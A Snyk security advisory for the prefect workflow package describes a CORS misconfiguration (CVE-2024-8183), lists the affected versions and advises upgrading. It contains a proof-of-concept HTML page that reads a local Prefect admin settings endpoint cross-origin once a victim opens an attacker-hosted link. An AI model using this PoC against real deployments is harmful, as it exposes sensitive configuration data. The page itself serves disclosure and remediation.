Origin Validation Error Affecting prefect package, versions [,2.20.17)[3.0.0,3.0.3)


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-PYTHON-PREFECT-9487016
  • published21 Mar 2025
  • disclosed20 Mar 2025
  • creditsrivallikusumba

Introduced: 20 Mar 2025

NewCVE-2024-8183  (opens in a new tab)
CWE-346  (opens in a new tab)

How to fix?

Upgrade prefect to version 2.20.17, 3.0.3 or higher.

Overview

prefect is a Prefect is a new workflow management system, designed for modern infrastructure and powered by the open-source Prefect Core workflow engine. Users organize Tasks into Flows, and Prefect takes care of the rest.

Affected versions of this package are vulnerable to Origin Validation Error due to a misconfiguration in the handling of CORS policies. An attacker can access sensitive data and potentially disrupt services by sending requests from unauthorized domains.

PoC

  1. Create cors.html on attacker server:
<!DOCTYPE html>
<html>
<head>
    <title>CORS PoC</title>
</head>
<body>
    <h1>CORS PoC</h1>
    <script>
        fetch('http://127.0.0.1:4200/api/admin/settings', {
            method: 'GET',
            headers: {
                'Origin': 'http://malicious-site.com'
            }
        })
        .then(response => response.text())  // Convert the response to text
        .then(data => {
            alert('CORS PoC Response:\n' + data);  // Alert the entire response
        })
        .catch(error => {
            alert('CORS PoC Error:\n' + error);  // Alert any error that occurs
        });
    </script>
</body>
</html>
  1. Host it, and send the link, as soon as victim will click on that link, the data will be popped up as alert(demo).

CVSS Base Scores

version 4.0
version 3.1